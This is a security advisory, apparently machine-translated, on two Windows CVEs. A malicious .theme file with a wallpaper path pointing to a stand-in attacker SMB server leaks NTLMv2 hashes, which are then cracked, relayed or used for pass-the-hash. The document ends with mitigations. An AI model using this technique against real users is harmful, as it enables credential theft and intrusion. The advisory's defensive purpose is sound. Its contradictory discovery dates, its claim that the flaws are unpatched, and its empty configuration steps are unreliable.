The new zero-day hole is to steal the authentic information of NTLM on Windows operating system
A new zero-day vulnerability has been discovered in the Windows operating system that allows attackers to steal a user's NTLM credentials simply by tricking them into viewing a malicious file in Windows Explorer.
Overview
In March 2025, several analysts discovered two critical Windows vulnerabilities: CVE-2025-21308 and CVE-2025-21377, which lead to the exposure of NTLM credentials. These vulnerabilities allow attackers to collect a user's NTLM credentials by tricking them into viewing a malicious file in Windows Explorer, such as opening a shared folder or USB drive containing the file, or viewing the Downloads folder where the file has been automatically downloaded from the attacker's website.
Currently, Microsoft has not released an official patch for these vulnerabilities. However, ACROS Security has provided unofficial patches through their 0patch service for all affected Windows versions. These patches are available for free until Microsoft releases an official patch.
Vulnerability Information
CVE-2025-21308
Description: CVE-2025-21308 is a security vulnerability related to the Windows Themes feature in the Windows operating system, announced on January 14, 2025.
CVSS Score: 6.5
Severity Level: Medium
Impact: This vulnerability allows an attacker to perform spoofing by convincing a user to download and apply a malicious theme file.
CVE-2025-21377
Description: CVE-2025-21377 is a security vulnerability related to the disclosure and spoofing of NTLM hashes in the Windows operating system, announced on February 11, 2025.
CVSS Score: 6.5
Severity Level: Medium
Impact: This vulnerability allows an attacker to collect a user's NTLMv2 credentials, which can lead to unauthorized access to the system and sensitive data.
Affected Versions
Affected Versions: The vulnerability affects multiple versions of Windows, including:
Windows 10 (versions from 1507 to 22H2)
Windows 11 (versions from 22H2 to 24H2)
Windows Server 2008, 2012, 2016, 2019, 2022, and 2025
Vulnerability Details
The two vulnerabilities, CVE-2025-21308 and CVE-2025-21377, can be exploited in attack campaigns to steal NTLM credentials and perform spoofing attacks. Here is how an attacker might exploit these vulnerabilities in a targeted campaign:
Initially, attackers will exploit the CVE-2025-21308 (Windows Themes Spoofing) vulnerability to:
Trick users into downloading and applying a malicious Windows Theme file to steal NTLM credentials.
Facilitate NTLM relay attacks or brute-force password hash attacks.
To execute this, hackers need to create a .theme file with malicious content, where the wallpaper or sound scheme is customized to point to a remote SMB or WebDAV server controlled by the attacker.
\=> Here, \\attacker-server\share\malicious.jpg is a remote SMB path. When Windows tries to load this wallpaper, it will automatically send the user's NTLMv2 hash to the attacker's server.
After creating the .theme file, the attacker will distribute it to victims using methods such as:
Sending via email as an attachment or download link.
Embedding in websites for users to unknowingly download.
Bundling in malicious software packages or game mods.
When users open or apply the .theme file, Windows will attempt to load the theme components (wallpaper, icons, sounds, etc.). If the theme has a wallpaper from a remote SMB/WebDAV path, Windows will automatically send the user's NTLMv2 credentials to the attacker's server.
After obtaining the victim's NTLM hash or NTLM relay, the attacker will continue to exploit the CVE-2025-21377 vulnerability for two main purposes:
Use the NTLM hash to perform NTLM relay attacks on Windows internal services (SMB, RDP, LDAP...).
Decrypt the NTLM hash to obtain the victim's password.
To decrypt the NTLM hash, the attacker has two options:
Decrypt the NTLM hash using brute-force
- If the password is weak, the attacker can crack the password and access the victim's Windows account using the Hashcat tool.
Relay NTLM to access other systems
- If the internal system supports NTLM authentication, the attacker can log into servers, access files, or gain administrative privileges.
Finally, after obtaining enough login information, the attackers will proceed with privilege escalation:
Use the collected information for privilege escalation.
Perform Pass-the-Hash attacks to move to other systems within the internal network.
Recommendations
Update the system immediately
Disable NTLM If Possible (turn off NTLM on Windows)
Open
Local Security Policy (secpol.msc), go to:
Or use Group Policy:
Block SMB/WebDAV Connections to the Internet
Block SMB access on port 445 and WebDAV on 80/443 using the Firewall.
Use Windows Defender Attack Surface Reduction (ASR) to automatically block SMB/WebDAV.
Block Malicious Theme & Shortcut Files (.theme, .lnk, .html)
Do not open
.theme,.themepack,.desktopthemepackfilefrom untrusted sources.Block these extensions in email & browsers:
- Use Microsoft Defender for Office 365 to block
.theme,.lnk,.htmlfiles.
- Use Microsoft Defender for Office 365 to block
Block opening shortcut files from untrusted directories using Group Policy:
Enable SMB Signing to Prevent NTLM Relay
If NTLM must be used, enable SMB Signing to prevent NTLM relay attacks.
Use Multi-Factor Authentication (MFA)
- If possible, require MFA on all administrative and critical accounts.
Conclusion
Both CVE-2025-21308 and CVE-2025-21377 are serious vulnerabilities related to NTLM that can be exploited to collect NTLM hashes and perform relay attacks or brute-force password attacks. Exploiting these two vulnerabilities can pose significant risks if proper protective measures are not in place. Therefore, updating systems and applying security methods are the best ways to protect businesses and users from these attacks.
